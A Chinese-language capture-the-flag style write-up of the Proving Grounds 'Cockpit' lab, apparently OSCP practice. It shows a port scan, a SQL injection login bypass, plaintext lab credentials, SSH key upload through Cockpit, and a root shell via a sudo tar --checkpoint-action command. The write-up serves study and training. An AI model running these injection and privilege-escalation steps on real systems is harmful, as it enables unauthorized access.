临渊羡鱼

退而结网

0%

Proving Grounds Practice - Cockpit

Posted on In , ,
Proving Grounds Practice Lab中Cockpit打靶过程记录

scans

autorecon

info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
- OS
  Ubuntu 20.04.6 LTS
- ports
- 22
  openSSH 8.2
- 80
  Apache 2.4.41
  Title: blaze

  http://192.168.166.10/img/
  http://192.168.166.10/blocked.html
  http://192.168.166.10/login.php
  http://192.168.166.10/db_config.php
- 9090
  version 2.1.4
  OpenSSL 3.3.2.3
  ssl/zeus-admin?
- things to try
  - apache 2.4.41
  - 80 admin
  - 9090 zeus-admin
  - blaze username
  - cockpit

22 openssh 8.2

没有已知漏洞

80 blaze

登录192.168.166.10

弱密码admin:admin/123456/password/abc123 都不正确

9090 cockpit

192.168.166.10:9090

弱密码登录无效

查看源码cms: cockpit

searchsploit cockpit 已知漏洞,利用不成功,搜索cockpit exploit也没有收货

foothold

查看hits, blaze存在sql注入漏洞,admin’ –

登录后得到用户和base64编码的密码

解码后得到

1
2
3
4
5
james
canttouchhhthiss@455152

cameron
thisscanttbetouchedd@455152

使用james和密码ssh登录,发现只支持使用公私钥验证

1
2
ssh james@192.168.166.10
james@192.168.166.10: Permission denied (publickey).

9090使用james登录,在账户里发现可以上传公钥

1
2
3
4
ssh james@192.168.166.10

whoami
james

escalation

检查进程、定时任务等没有收获,sudo -l 发现可以执行tar命令, https://gtfobins.github.io/gtfobins/tar/直接提权root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
sudo -l
Matching Defaults entries for james on blaze:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on blaze:
    (ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *
  
  
  
sudo /usr/bin/tar -czvf /tmp/backup.tar.gz * --checkpoint=1 --checkpoint-action=exec=/bin/sh
apt-changelog-ZA6iyM/
snap-private-tmp/
snap-private-tmp/snap.lxd/
snap-private-tmp/snap.lxd/tmp/
ssh-6KkSqBBpG1eF/
/usr/bin/tar: ssh-6KkSqBBpG1eF/agent.131828: socket ignored
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-apache2.service-43mHFi/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-apache2.service-43mHFi/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-ModemManager.service-l1tS1f/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-ModemManager.service-l1tS1f/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-logind.service-0vp5Lh/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-logind.service-0vp5Lh/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-resolved.service-pGOwNf/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-resolved.service-pGOwNf/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-timesyncd.service-Ll8SPh/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-timesyncd.service-Ll8SPh/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-upower.service-65G4Yi/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-upower.service-65G4Yi/tmp/
tmp.es7Hxs9VMb
tmp.eXjbihXM2N
tmp.gvPWK74jcw
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

反思

  1. 最近刷lab都是使用已知漏洞,最应该尝试的sql注入都没有测试
  2. 发现无法利用的exploit 不要死磕?oscp不会考需要修改很多才能利用的题目?